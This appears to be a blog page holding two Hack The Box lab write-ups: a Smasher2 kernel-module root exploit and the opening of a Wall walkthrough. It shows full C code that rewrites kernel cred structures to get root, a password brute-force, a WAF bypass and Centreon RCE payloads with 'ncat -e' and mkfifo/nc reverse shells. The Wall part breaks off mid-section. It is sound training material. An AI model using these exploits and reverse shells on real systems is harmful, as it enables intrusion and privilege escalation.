-rw-r--r-- 1 root     root      900 Feb 16  2019 README
drwxrwxr-x 4 dzonerzy dzonerzy 4096 Dec 13 12:50 smanager
-rw-r----- 1 root     dzonerzy   33 Feb 17  2019 user.txt
dzonerzy@smasher2:~$ cat README 


         .|'''.|                            '||                      
         ||..  '  .. .. ..    ....    ....   || ..     ....  ... ..  
          ''|||.   || || ||  '' .||  ||. '   ||' ||  .|...||  ||' '' 
        .     '||  || || ||  .|' ||  . '|..  ||  ||  ||       ||     
        |'....|'  .|| || ||. '|..'|' |'..|' .||. ||.  '|...' .||.    v2.0 
                                                             
                                                        by DZONERZY 

Ye you've come this far and I hope you've learned something new, smasher wasn't created
with the intent to be a simple puzzle game... but instead I just wanted to pass my limited
knowledge to you fellow hacker, I know it's not much but this time you'll need more than
skill, you will need to think outside the box to complete smasher 2 , have fun and happy

                                       Hacking!

free(knowledge);
free(knowledge);
* error for object 0xd00000000b400: pointer being freed was not allocated *


dzonerzy@smasher2:~$ 

After some enumeration, I checked the auth log and saw this line:

dzonerzy@smasher2:~$ cat /var/log/auth.log
----------
 Redacted
----------
Dec 13 11:49:34 smasher2 sudo:     root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/sbin/insmod /lib/modules/4.15.0-45-generic/kernel/drivers/hid/dhid.ko
----------
 Redacted
----------
dzonerzy@smasher2:~$

insmod (stands for insert module) is a tool used to load kernel modules. dhid.ko is a kernel module (ko stands for kernel object)

dzonerzy@smasher2:~$ cd /lib/modules/4.15.0-45-generic/kernel/drivers/hid/
dzonerzy@smasher2:/lib/modules/4.15.0-45-generic/kernel/drivers/hid$ file dhid.ko 
dhid.ko: ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), BuildID[sha1]=d4315261f7c9c38393394f6779378abcff6270d2, not stripped
dzonerzy@smasher2:/lib/modules/4.15.0-45-generic/kernel/drivers/hid$

I checked the loaded kernel modules and that module was still loaded:

dzonerzy@smasher2:/lib/modules/4.15.0-45-generic/kernel/drivers/hid$ lsmod | grep dhid
dhid                   16384  0
dzonerzy@smasher2:/lib/modules/4.15.0-45-generic/kernel/drivers/hid$

We can use modinfo to list the information about that module, as you can see it was written by dzonerzy:

dzonerzy@smasher2:/lib/modules/4.15.0-45-generic/kernel/drivers/hid$ modinfo dhid
filename:       /lib/modules/4.15.0-45-generic/kernel/drivers/hid/dhid.ko
version:        1.0
description:    LKM for dzonerzy dhid devices
author:         DZONERZY
license:        GPL
srcversion:     974D0512693168483CADFE9
depends:        
retpoline:      Y
name:           dhid
vermagic:       4.15.0-45-generic SMP mod_unload 
dzonerzy@smasher2:/lib/modules/4.15.0-45-generic/kernel/drivers/hid$ 

Last thing I wanted to check was if there was device driver file for the module:

dzonerzy@smasher2:/lib/modules/4.15.0-45-generic/kernel/drivers/hid$ ls -la /dev/ | grep dhid
crwxrwxrwx  1 root root    243,   0 Dec 13 11:49 dhid
dzonerzy@smasher2:/lib/modules/4.15.0-45-generic/kernel/drivers/hid$ 

I downloaded the module on my box to start analyzing it:

root@kali:~/Desktop/HTB/boxes/smasher2# scp -i id_rsa [email protected]:/lib/modules/4.15.0-45-generic/kernel/drivers/hid/dhid.ko ./ 
dhid.ko                                                                                                                                                                                                  100% 8872    16.1KB/s   00:00    
root@kali:~/Desktop/HTB/boxes/smasher2# file dhid.ko 
dhid.ko: ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), BuildID[sha1]=d4315261f7c9c38393394f6779378abcff6270d2, not stripped
root@kali:~/Desktop/HTB/boxes/smasher2#

dhid.ko: Analysis

I opened the module in ghidra then I started checking the functions:


The function dev_read() had a hint that this is the intended way to root the box:

long dev_read(undefined8 param_1,undefined8 param_2)

{
  int iVar1;
  
  __fentry__();
  iVar1 = _copy_to_user(param_2,"This is the right way, please exploit this shit!",0x30);
  return (ulong)(-(uint)(iVar1 == 0) & 0xf) - 0xe;
}

One interesting function that caught my attention was dev_mmap():

ulong dev_mmap(undefined8 param_1,long *param_2)

{
  uint uVar1;
  ulong uVar2;
  uint uVar3;
  
  __fentry__();
  uVar3 = (int)param_2[1] - *(int *)param_2;
  uVar1 = (uint)(param_2[0x13] << 0xc);
  printk(&DAT_00100380,(ulong)uVar3,param_2[0x13] << 0xc & 0xffffffff);
  if ((((int)uVar3 < 0x10001) && (uVar1 < 0x1001)) && ((int)(uVar3 + uVar1) < 0x10001)) {
    uVar1 = remap_pfn_range(param_2,*param_2,(long)(int)uVar1,param_2[1] - *param_2,param_2[9]);
    uVar2 = (ulong)uVar1;
    if (uVar1 == 0) {
      printk(&DAT_0010057b);
    }
    else {
      uVar2 = 0xfffffff5;
      printk(&DAT_00100567);
    }
  }
  else {
    uVar2 = 0xfffffff5;
    printk(&DAT_001003b0);
  }
  return uVar2;
}

In case you don’t know what mmap is, simply mmap is a system call which is used to map memory to a file or a device. (Check this)
The function dev_mmap() is a custom mmap handler.
The interesting part here is the call to remap_pfn_range() function (remap kernel memory to userspace):

remap_pfn_range(param_2,*param_2,(long)(int)uVar1,param_2[1] - *param_2,param_2[9]);

I checked the documentation of remap_pfn_range() to know more about it, the function takes 5 arguments:

int remap_pfn_range (	struct vm_area_struct * vma,
 	unsigned long addr,
 	unsigned long pfn,
 	unsigned long size,
 	pgprot_t prot);

Description of each argument:

struct vm_area_struct * vma
    user vma to map to

unsigned long addr
    target user address to start at

unsigned long pfn
    physical address of kernel memory

unsigned long size
    size of map area

pgprot_t prot
    page protection flags for this mapping

If we look at the function call again we can see that the 3rd and 4th arguments (physical address of the kernel memory and size of map area) are given to the function without any prior validation:

ulong dev_mmap(undefined8 param_1,long *param_2)

{
  uint uVar1;
  ulong uVar2;
  uint uVar3;
  
  __fentry__();
  uVar3 = (int)param_2[1] - *(int *)param_2;
  uVar1 = (uint)(param_2[0x13] << 0xc);
  printk(&DAT_00100380,(ulong)uVar3,param_2[0x13] << 0xc & 0xffffffff);
  if ((((int)uVar3 < 0x10001) && (uVar1 < 0x1001)) && ((int)(uVar3 + uVar1) < 0x10001)) {
    uVar1 = remap_pfn_range(param_2,*param_2,(long)(int)uVar1,param_2[1] - *param_2,param_2[9]);
    ...

This means that we can map any size of memory we want and read/write to it, allowing us to even access the kernel memory.

dhid.ko: Exploitation –> Root Shell –> Root Flag

Luckily, this white paper had a similar scenario and explained the exploitation process very well, I recommend reading it after finishing the write-up, I will try to explain the process as good as I can but the paper will be more detailed. In summary, what’s going to happen is that we’ll map a huge amount of memory and search through it for our process’s cred structure (The cred structure holds our process credentials) then overwrite our uid and gid with 0 and execute /bin/sh. Let’s go through it step by step.
First, we need to make sure that it’s really exploitable, we’ll try to map a huge amount of memory and check if it worked:

#include <stdio.h>
#include <stdlib.h>                                                        
#include <sys/types.h>                                                       
#include <unistd.h>
#include <fcntl.h>
#include <sys/mman.h>

int main(int argc, char * const * argv){
	
	printf("[+] PID: %d\n", getpid());
	int fd = open("/dev/dhid", O_RDWR);
	
	if (fd < 0){
		printf("[!] Open failed!\n");
		return -1;
	}
	
	printf("[*] Open OK fd: %d\n", fd);

	unsigned long size = 0xf0000000;
	unsigned long mmapStart = 0x42424000;
	unsigned int * addr = (unsigned int *)mmap((void*)mmapStart, size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0x0);

	if (addr == MAP_FAILED){
		perror("[!] Failed to mmap");
		close(fd);
		return -1;
	}

	printf("[*] mmap OK address: %lx\n", addr);
	
	int stop = getchar();
	return 0;
}

I compiled the code and uploaded it to the box:

root@kali:~/Desktop/HTB/boxes/smasher2# gcc -o pwn pwn.c 
root@kali:~/Desktop/HTB/boxes/smasher2# scp -i id_rsa ./pwn [email protected]:/dev/shm/pwn
pwn                                                                                100%   17KB  28.5KB/s   00:00    
root@kali:~/Desktop/HTB/boxes/smasher2# 

Then I ran it:

dzonerzy@smasher2:/dev/shm$ ./pwn 
[+] PID: 8186
[*] Open OK fd: 3
[*] mmap OK address: 42424000

From another ssh session I checked the process memory mapping, the attempt was successful:

dzonerzy@smasher2:/dev/shm$ cat /proc/8186/maps 
42424000-132424000 rw-s 00000000 00:06 440                               /dev/dhid
----------
 Redacted
----------
dzonerzy@smasher2:/dev/shm$

Now we can start searching for the cred structure that belongs to our process, if we take a look at the how the cred structure looks like:

struct cred {
	atomic_t	usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
	atomic_t	subscribers;	/* number of processes subscribed */
	void		*put_addr;
	unsigned	magic;
#define CRED_MAGIC	0x43736564
#define CRED_MAGIC_DEAD	0x44656144
#endif
	kuid_t		uid;		/* real UID of the task */
	kgid_t		gid;		/* real GID of the task */
	kuid_t		suid;		/* saved UID of the task */
	kgid_t		sgid;		/* saved GID of the task */
	kuid_t		euid;		/* effective UID of the task */
	kgid_t		egid;		/* effective GID of the task */
	kuid_t		fsuid;		/* UID for VFS ops */
	kgid_t		fsgid;		/* GID for VFS ops */
	unsigned	securebits;	/* SUID-less security management */
	kernel_cap_t	cap_inheritable; /* caps our children can inherit */
	kernel_cap_t	cap_permitted;	/* caps we're permitted */
	kernel_cap_t	cap_effective;	/* caps we can actually use */
	kernel_cap_t	cap_bset;	/* capability bounding set */
	kernel_cap_t	cap_ambient;	/* Ambient capability set */
#ifdef CONFIG_KEYS
	unsigned char	jit_keyring;	/* default keyring to attach requested
					 * keys to */
	struct key	*session_keyring; /* keyring inherited over fork */
	struct key	*process_keyring; /* keyring private to this process */
	struct key	*thread_keyring; /* keyring private to this thread */
	struct key	*request_key_auth; /* assumed request_key authority */
#endif
#ifdef CONFIG_SECURITY
	void		*security;	/* subjective LSM security */
#endif
	struct user_struct *user;	/* real user ID subscription */
	struct user_namespace *user_ns; /* user_ns the caps and keyrings are relative to. */
	struct group_info *group_info;	/* supplementary groups for euid/fsgid */
	/* RCU deletion */
	union {
		int non_rcu;			/* Can we skip RCU deletion? */
		struct rcu_head	rcu;		/* RCU deletion hook */
	};
}

We’ll notice that the first 8 integers (representing our uid, gid, saved uid, saved gid, effective uid, effective gid, uid and gid for the virtual file system) are known to us, which represents a reliable pattern to search for in the memory:

	kuid_t		uid;		/* real UID of the task */
	kgid_t		gid;		/* real GID of the task */
	kuid_t		suid;		/* saved UID of the task */
	kgid_t		sgid;		/* saved GID of the task */
	kuid_t		euid;		/* effective UID of the task */
	kgid_t		egid;		/* effective GID of the task */
	kuid_t		fsuid;		/* UID for VFS ops */
	kgid_t		fsgid;		/* GID for VFS ops */

These 8 integers are followed by a variable called securebits:

    unsigned    securebits; /* SUID-less security management */

Then that variable is followed by our capabilities:

    kernel_cap_t    cap_inheritable; /* caps our children can inherit */
    kernel_cap_t    cap_permitted;  /* caps we're permitted */
    kernel_cap_t    cap_effective;  /* caps we can actually use */
    kernel_cap_t    cap_bset;   /* capability bounding set */
    kernel_cap_t    cap_ambient;    /* Ambient capability set */

Since we know the first 8 integers we can search through the memory for that pattern, when we find a valid cred structure pattern we’ll overwrite each integer of the 8 with a 0 and check if our uid changed to 0, we’ll keep doing it until we overwrite the one which belongs to our process, then we’ll overwrite the capabilities with 0xffffffffffffffff and execute /bin/sh. Let’s try to implement the search for cred structures first.
To do that we will get our uid with getuid():

	unsigned int uid = getuid();

Then search for 8 consecutive integers that are equal to our uid, when we find a cred structure we’ll print its pointer and keep searching:

	while (((unsigned long)addr) < (mmapStart + size - 0x40)){
		credIt = 0;
		if(
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid
			){
				credNum++;
				printf("[*] Cred structure found! ptr: %p, crednum: %d\n", addr, credNum);
			}

		addr++;

	}

pwn.c:

#include <stdio.h>                                                                          
#include <stdlib.h>                                                        
#include <sys/types.h>                                                       
#include <unistd.h>
#include <fcntl.h>
#include <sys/mman.h>

int main(int argc, char * const * argv){
	
	printf("[+] PID: %d\n", getpid());
	
	int fd = open("/dev/dhid", O_RDWR);
	
	if (fd < 0){
		printf("[!] Open failed!\n");
		return -1;
	}

	printf("[*] Open OK fd: %d\n", fd);
	
	unsigned long size = 0xf0000000;
	unsigned long mmapStart = 0x42424000;
	unsigned int * addr = (unsigned int *)mmap((void*)mmapStart, size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0x0);
	
	if (addr == MAP_FAILED){
		perror("[!] Failed to mmap");
		close(fd);
		return -1;
	}

	printf("[*] mmap OK address: %lx\n", addr);

	unsigned int uid = getuid();

	printf("[*] Current UID: %d\n", uid);

	unsigned int credIt = 0;
	unsigned int credNum = 0;

	while (((unsigned long)addr) < (mmapStart + size - 0x40)){
		credIt = 0;
		if(
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid
			){
				credNum++;
				printf("[*] Cred structure found! ptr: %p, crednum: %d\n", addr, credNum);
			}

		addr++;

	}

	fflush(stdout);
	
	int stop = getchar();
	return 0;
}

It worked:

dzonerzy@smasher2:/dev/shm$ ./pwn 
[+] PID: 1215
[*] Open OK fd: 3
[*] mmap OK address: 42424000
[*] Current UID: 1000
[*] Cred structure found! ptr: 0x76186484, crednum: 1
[*] Cred structure found! ptr: 0x76186904, crednum: 2
[*] Cred structure found! ptr: 0x76186b44, crednum: 3
[*] Cred structure found! ptr: 0x76186cc4, crednum: 4
[*] Cred structure found! ptr: 0x76186d84, crednum: 5
[*] Cred structure found! ptr: 0x76186fc4, crednum: 6
[*] Cred structure found! ptr: 0x761872c4, crednum: 7
[*] Cred structure found! ptr: 0x76187684, crednum: 8
[*] Cred structure found! ptr: 0x76187984, crednum: 9
[*] Cred structure found! ptr: 0x76187b04, crednum: 10
[*] Cred structure found! ptr: 0x76187bc4, crednum: 11
[*] Cred structure found! ptr: 0x76187c84, crednum: 12
[*] Cred structure found! ptr: 0x77112184, crednum: 13
[*] Cred structure found! ptr: 0x771123c4, crednum: 14
[*] Cred structure found! ptr: 0x77112484, crednum: 15
[*] Cred structure found! ptr: 0x771129c4, crednum: 16
[*] Cred structure found! ptr: 0x77113084, crednum: 17
[*] Cred structure found! ptr: 0x77113144, crednum: 18
[*] Cred structure found! ptr: 0x77113504, crednum: 19
[*] Cred structure found! ptr: 0x77113c84, crednum: 20
[*] Cred structure found! ptr: 0x7714a604, crednum: 21
[*] Cred structure found! ptr: 0x7714aa84, crednum: 22
[*] Cred structure found! ptr: 0x7714ac04, crednum: 23
[*] Cred structure found! ptr: 0x7714afc4, crednum: 24
[*] Cred structure found! ptr: 0x7714ba44, crednum: 25
[*] Cred structure found! ptr: 0xb9327bc4, crednum: 26

dzonerzy@smasher2:/dev/shm$ 

Now we need to overwrite the cred structure that belongs to our process, we’ll keep overwriting every cred structure we find and check our uid, when we overwrite the one that belongs to our process our uid should be 0:

			credIt = 0;
			addr[credIt++] = 0;
			addr[credIt++] = 0;
			addr[credIt++] = 0;
			addr[credIt++] = 0;
			addr[credIt++] = 0;
			addr[credIt++] = 0;
			addr[credIt++] = 0;
			addr[credIt++] = 0;
		
			if (getuid() == 0){
				printf("[*] Process cred structure found ptr: %p, crednum: %d\n", addr, credNum);
				break;
			}

pwn.c:

#include <stdio.h>                                                                          
#include <stdlib.h>                                                        
#include <sys/types.h>                                                       
#include <unistd.h>
#include <fcntl.h>
#include <sys/mman.h>

int main(int argc, char * const * argv){

	printf("[+] PID: %d\n", getpid());
	int fd = open("/dev/dhid", O_RDWR);
	
	if (fd < 0){
		printf("[!] Open failed!\n");
		return -1;
	}

	printf("[*] Open OK fd: %d\n", fd);

	unsigned long size = 0xf0000000;
	unsigned long mmapStart = 0x42424000;
	unsigned int * addr = (unsigned int *)mmap((void*)mmapStart, size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0x0);

	if (addr == MAP_FAILED){
		perror("Failed to mmap: ");
		close(fd);
		return -1;
	}

	printf("[*] mmap OK address: %lx\n", addr);

	unsigned int uid = getuid();
	
	printf("[*] Current UID: %d\n", uid);
	
	unsigned int credIt = 0;
	unsigned int credNum = 0;

	while (((unsigned long)addr) < (mmapStart + size - 0x40)){

		credIt = 0;
	
		if(
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid
			){
				credNum++;
			
				printf("[*] Cred structure found! ptr: %p, crednum: %d\n", addr, credNum);
		
			credIt = 0;
			addr[credIt++] = 0;
			addr[credIt++] = 0;
			addr[credIt++] = 0;
			addr[credIt++] = 0;
			addr[credIt++] = 0;
			addr[credIt++] = 0;
			addr[credIt++] = 0;
			addr[credIt++] = 0;
		
			if (getuid() == 0){
				printf("[*] Process cred structure found ptr: %p, crednum: %d\n", addr, credNum);
				break;
			}

			else{
				credIt = 0;
				addr[credIt++] = uid;
				addr[credIt++] = uid;
				addr[credIt++] = uid;
				addr[credIt++] = uid;
				addr[credIt++] = uid;
				addr[credIt++] = uid;
				addr[credIt++] = uid;
				addr[credIt++] = uid;
			}
		}

	addr++;
}

fflush(stdout);

int stop = getchar();
return 0;
}
dzonerzy@smasher2:/dev/shm$ ./pwn 
[+] PID: 4773
[*] Open OK fd: 3
[*] mmap OK address: 42424000
[*] Current UID: 1000
[*] Cred structure found! ptr: 0x76186484, crednum: 1
[*] Cred structure found! ptr: 0x76186904, crednum: 2
[*] Cred structure found! ptr: 0x76186b44, crednum: 3
[*] Cred structure found! ptr: 0x76186cc4, crednum: 4
[*] Cred structure found! ptr: 0x76186fc4, crednum: 5
[*] Cred structure found! ptr: 0x76187684, crednum: 6
[*] Cred structure found! ptr: 0x76187bc4, crednum: 7
[*] Cred structure found! ptr: 0x77112184, crednum: 8
[*] Cred structure found! ptr: 0x771123c4, crednum: 9
[*] Cred structure found! ptr: 0x77112484, crednum: 10
[*] Cred structure found! ptr: 0x771129c4, crednum: 11
[*] Cred structure found! ptr: 0x77113084, crednum: 12
[*] Cred structure found! ptr: 0x77113144, crednum: 13
[*] Cred structure found! ptr: 0x77113504, crednum: 14
[*] Cred structure found! ptr: 0x77113c84, crednum: 15
[*] Cred structure found! ptr: 0x7714a484, crednum: 16
[*] Cred structure found! ptr: 0x7714a604, crednum: 17
[*] Cred structure found! ptr: 0x7714a6c4, crednum: 18
[*] Cred structure found! ptr: 0x7714a844, crednum: 19
[*] Cred structure found! ptr: 0x7714a9c4, crednum: 20
[*] Cred structure found! ptr: 0x7714aa84, crednum: 21
[*] Cred structure found! ptr: 0x7714ac04, crednum: 22
[*] Cred structure found! ptr: 0x7714ad84, crednum: 23
[*] Process cred structure found ptr: 0x7714ad84, crednum: 23

dzonerzy@smasher2:/dev/shm$

Great! now what’s left to do is to overwrite the capabilities in our cred structure with 0xffffffffffffffff and execute /bin/sh:

				credIt += 1; 
				addr[credIt++] = 0xffffffff;
				addr[credIt++] = 0xffffffff;
				addr[credIt++] = 0xffffffff;
				addr[credIt++] = 0xffffffff;
				addr[credIt++] = 0xffffffff;
				addr[credIt++] = 0xffffffff;
				addr[credIt++] = 0xffffffff;
				addr[credIt++] = 0xffffffff;
				addr[credIt++] = 0xffffffff;
				addr[credIt++] = 0xffffffff;

				execl("/bin/sh","-", (char *)NULL);

pwn.c:

#include <stdio.h>                                                         
#include <stdlib.h>                                                      
#include <sys/types.h>                                                              
#include <unistd.h>
#include <fcntl.h>
#include <sys/mman.h>

int main(int argc, char * const * argv){
	
	printf("\033[93m[+] PID: %d\n", getpid());
	int fd = open("/dev/dhid", O_RDWR);
	
	if (fd < 0){
		printf("\033[93m[!] Open failed!\n");
		return -1;
	}

	printf("\033[32m[*] Open OK fd: %d\n", fd);

	unsigned long size = 0xf0000000;
	unsigned long mmapStart = 0x42424000;
	unsigned int * addr = (unsigned int *)mmap((void*)mmapStart, size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0x0);

	if (addr == MAP_FAILED){
		perror("\033[93m[!] Failed to mmap !");
		close(fd);
		return -1;
	}

	printf("\033[32m[*] mmap OK address: %lx\n", addr);
	
	unsigned int uid = getuid();
	
	puts("\033[93m[+] Searching for the process cred structure ...");
	
	unsigned int credIt = 0;
	unsigned int credNum = 0;
	
	while (((unsigned long)addr) < (mmapStart + size - 0x40)){
		credIt = 0;
		if(
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid
			){
				credNum++;
				
				credIt = 0;
				addr[credIt++] = 0;
				addr[credIt++] = 0;
				addr[credIt++] = 0;
				addr[credIt++] = 0;
				addr[credIt++] = 0;
				addr[credIt++] = 0;
				addr[credIt++] = 0;
				addr[credIt++] = 0;
		
			if (getuid() == 0){
			
				printf("\033[32m[*] Cred structure found ! ptr: %p, crednum: %d\n", addr, credNum);
				puts("\033[32m[*] Got Root");
				puts("\033[32m[+] Spawning a shell");

				credIt += 1; 
				addr[credIt++] = 0xffffffff;
				addr[credIt++] = 0xffffffff;
				addr[credIt++] = 0xffffffff;
				addr[credIt++] = 0xffffffff;
				addr[credIt++] = 0xffffffff;
				addr[credIt++] = 0xffffffff;
				addr[credIt++] = 0xffffffff;
				addr[credIt++] = 0xffffffff;
				addr[credIt++] = 0xffffffff;
				addr[credIt++] = 0xffffffff;

				execl("/bin/sh","-", (char *)NULL);
				puts("\033[93m[!] Execl failed...");
			
				break;
			}
			else{
				
				credIt = 0;
				addr[credIt++] = uid;
				addr[credIt++] = uid;
				addr[credIt++] = uid;
				addr[credIt++] = uid;
				addr[credIt++] = uid;
				addr[credIt++] = uid;
				addr[credIt++] = uid;
				addr[credIt++] = uid;
			}
		}
	addr++;
	}

	return 0;
}

And finally:

dzonerzy@smasher2:/dev/shm$ ./pwn 
[+] PID: 1153
[*] Open OK fd: 3
[*] mmap OK address: 42424000
[+] Searching for the process cred structure ...
[*] Cred structure found ! ptr: 0xb60ad084, crednum: 20
[*] Got Root
[+] Spawning a shell
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),111(lpadmin),112(sambashare),1000(dzonerzy)
# 




We owned root !
That’s it , Feedback is appreciated !
Don’t forget to read the previous write-ups , Tweet about the write-up if you liked it , follow on twitter @Ahm3d_H3sham
Thanks for reading.

Previous Hack The Box write-up : Hack The Box - Wall
Next Hack The Box write-up : Hack The Box - Craft

Hack The Box - Wall

By: 0xRick
7 December 2019 at 05:00

Hack The Box - Wall

Quick Summary

Hey guys, today Wall retired and here’s my write-up about it. It was an easy Linux machine with a web application vulnerable to RCE, WAF bypass to be able to exploit that vulnerability and a vulnerable suid binary. It’s a Linux machine and its ip is 10.10.10.157, I added it to /etc/hosts as wall.htb. Let’s jump right in !


Nmap

As always we will start with nmap to scan for open ports and services:

root@kali:~/Desktop/HTB/boxes/wall# nmap -sV -sT -sC -o nmapinitial wall.htb 
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-06 13:59 EST
Nmap scan report for wall.htb (10.10.10.157)
Host is up (0.50s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 2e:93:41:04:23:ed:30:50:8d:0d:58:23:de:7f:2c:15 (RSA)
|   256 4f:d5:d3:29:40:52:9e:62:58:36:11:06:72:85:1b:df (ECDSA)
|_  256 21:64:d0:c0:ff:1a:b4:29:0b:49:e1:11:81:b6:73:66 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 241.17 seconds
root@kali:~/Desktop/HTB/boxes/wall# 

We got http on port 80 and ssh on port 22. Let’s check the web service.

Web Enumeration

The index page was just the default apache page:


So I ran gobuster and got these results:

root@kali:~/Desktop/HTB/boxes/wall# gobuster dir -u http://wall.htb/ -w /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://wall.htb/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2019/12/06 14:08:02 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/index.html (Status: 200)
/monitoring (Status: 401)
/server-status (Status: 403)

The only interesting thing was /monitoring, however that path was protected by basic http authentication:


I didn’t have credentials, I tried bruteforcing them but it didn’t work so I spent sometime enumerating but I couldn’t find the credentials anywhere. Turns out that by changing the request method from GET to POST we can bypass the authentication:

root@kali:~/Desktop/HTB/boxes/wall# curl -X POST http://wall.htb/monitoring/
<h1>This page is not ready yet !</h1>
<h2>We should redirect you to the required page !</h2>

<meta http-equiv="refresh" content="0; URL='/centreon'" />

root@kali:~/Desktop/HTB/boxes/wall# 

The response was a redirection to /centreon:


Centreon is a network, system, applicative supervision and monitoring tool. -github

Bruteforcing the credentials through the login form will require writing a script because there’s a csrf token that changes every request, alternatively we can use the API.
According to the authentication part we can send a POST request to /api/index.php?action=authenticate with the credentials. In case of providing valid credentials it will respond with the authentication token, otherwise it will respond with a 403.
I used wfuzz with darkweb2017-top10000.txt from seclists:

root@kali:~/Desktop/HTB/boxes/wall# wfuzz -c -X POST -d "username=admin&password=FUZZ" -w ./darkweb2017-top10000.txt http://wall.htb/centreon/api/index.php?action=authenticate

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.4 - The Web Fuzzer                           *
********************************************************
Target: http://wall.htb/centreon/api/index.php?action=authenticate
Total requests: 10000
===================================================================
ID           Response   Lines    Word     Chars       Payload
===================================================================
000000005:   403        0 L      2 W      17 Ch       "qwerty"
000000006:   403        0 L      2 W      17 Ch       "abc123"
000000008:   200        0 L      1 W      60 Ch       "password1"
000000004:   403        0 L      2 W      17 Ch       "password"
000000007:   403        0 L      2 W      17 Ch       "12345678"
000000009:   403        0 L      2 W      17 Ch       "1234567"
000000010:   403        0 L      2 W      17 Ch       "123123"
000000001:   403        0 L      2 W      17 Ch       "123456"
000000002:   403        0 L      2 W      17 Ch       "123456789"
000000003:   403        0 L      2 W      17 Ch       "111111"
000000011:   403        0 L      2 W      17 Ch       "1234567890"
000000012:   403        0 L      2 W      17 Ch       "000000"
000000013:   403        0 L      2 W      17 Ch       "12345"
000000015:   403        0 L      2 W      17 Ch       "1q2w3e4r5t" 
^C
Finishing pending requests...
root@kali:~/Desktop/HTB/boxes/wall# 

password1 resulted in a 200 response so its the right password:



RCE | WAF Bypass –> Shell as www-data

I checked the version of centreon and it was 19.04:


It was vulnerable to RCE (CVE-2019-13024, discovered by the author of the box) and there was an exploit for it:

root@kali:~/Desktop/HTB/boxes/wall# searchsploit centreon
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                                                                    |  Path
                                                                                                                                                                                                  | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
----------
 Redacted
----------
Centreon 19.04  - Remote Code Execution                                                                                                                                                           | exploits/php/webapps/47069.py
----------
 Redacted
----------
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
root@kali:~/Desktop/HTB/boxes/wall# 

But when I tried to run the exploit I didn’t get a shell:


So I started looking at the exploit code and tried to do it manually.
The vulnerability is in the poller configuration page (/main.get.php?p=60901) :

    poller_configuration_page = url + "/main.get.php?p=60901"

The script attempts to configure a poller and this is the payload that’s sent in the POST request:

    payload_info = {
        "name": "Central",
        "ns_ip_address": "127.0.0.1",
        # this value should be 1 always
        "localhost[localhost]": "1",
        "is_default[is_default]": "0",
        "remote_id": "",
        "ssh_port": "22",
        "init_script": "centengine",
        # this value contains the payload , you can change it as you want
        "nagios_bin": "ncat -e /bin/bash {0} {1} #".format(ip, port),
        "nagiostats_bin": "/usr/sbin/centenginestats",
        "nagios_perfdata": "/var/log/centreon-engine/service-perfdata",
        "centreonbroker_cfg_path": "/etc/centreon-broker",
        "centreonbroker_module_path": "/usr/share/centreon/lib/centreon-broker",
        "centreonbroker_logs_path": "",
        "centreonconnector_path": "/usr/lib64/centreon-connector",
        "init_script_centreontrapd": "centreontrapd",
        "snmp_trapd_path_conf": "/etc/snmp/centreon_traps/",
        "ns_activate[ns_activate]": "1",
        "submitC": "Save",
        "id": "1",
        "o": "c",
        "centreon_token": poller_token,


    }

nagios_bin is the vulnerable parameter:

        # this value contains the payload , you can change it as you want
        "nagios_bin": "ncat -e /bin/bash {0} {1} #".format(ip, port),

I checked the configuration page and looked at the HTML source, nagios_bin is the monitoring engine binary, I tried to inject a command there:


When I tried to save the configuration I got a 403:


That’s because there’s a WAF blocking these attempts, I could bypass the WAF by replacing the spaces in the commands with ${IFS}. I saved the reverse shell payload in a file then I used wget to get the file contents and I piped it to bash.
a:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.xx.xx 1337 >/tmp/f 

modified parameter:

